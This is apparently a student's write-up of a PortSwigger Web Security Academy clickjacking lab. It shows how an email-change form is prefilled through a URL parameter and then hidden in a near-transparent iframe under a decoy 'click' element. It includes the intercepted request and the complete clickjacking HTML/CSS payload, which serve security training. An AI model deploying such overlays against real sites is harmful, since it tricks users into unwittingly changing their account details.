Skip to content
Field Value
Platform PortSwigger Web Security Academy
Type Clickjacking — Prefilled Form via URL Parameter
Difficulty Apprentice
Objective Trick the victim into clicking "Update email" with an attacker-controlled email already filled in

Clickjacking with Form Input Data Prefilled from a URL Parameter — Writeup

Initial Observation

Logged in as wiener:peter. The account page has the usual email change form:

<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
    <label>Email</label>
    <input required="" type="email" name="email" value="">
    <input required="" type="hidden" name="csrf" value="nbryeYjdQ9iIk263ZFT6CO5LCXOD8ScR">
    <button class="button" type="submit"> Update email </button>
</form>
Screenshot

Intercepting the email change request:

POST /my-account/change-email HTTP/2
Host: 0a6e0053047645ff80e70df7001b0023.web-security-academy.net
Cookie: session=JCjknJqY5hjt2HxN9x7D18cw6x76zNe3
[email protected]&csrf=nbryeYjdQ9iIk263ZFT6CO5LCXOD8ScR
Screenshot

Testing whether the form can be prepopulated via a URL parameter:

/[email protected]
Screenshot

The input field already has the email value set. The form is ready to submit with attacker-controlled data — the victim just needs to click the button.

Attack Path

Building the Clickjacking Page

Same structure as the previous lab, but this time the iframe src includes the ?email= parameter to prefill the form. Placing the "click" div over the Update email button:

<style>
    iframe {
        width: 500px;
        height: 600px;
        opacity: xxx;
    }

    div {
        position: absolute;
        top: 500px;
        left: 40px;
    }
</style>

<div>click</div>

<iframe src="https://0a6e0053047645ff80e70df7001b0023.web-security-academy.net/[email protected]"></iframe>
Screenshot

The "click" text is sitting right above the Update email button. Setting opacity: 0.001 to make the iframe invisible:

Screenshot

Deliver exploit to victim → victim clicks → email changes to [email protected] → lab solved :P

Resources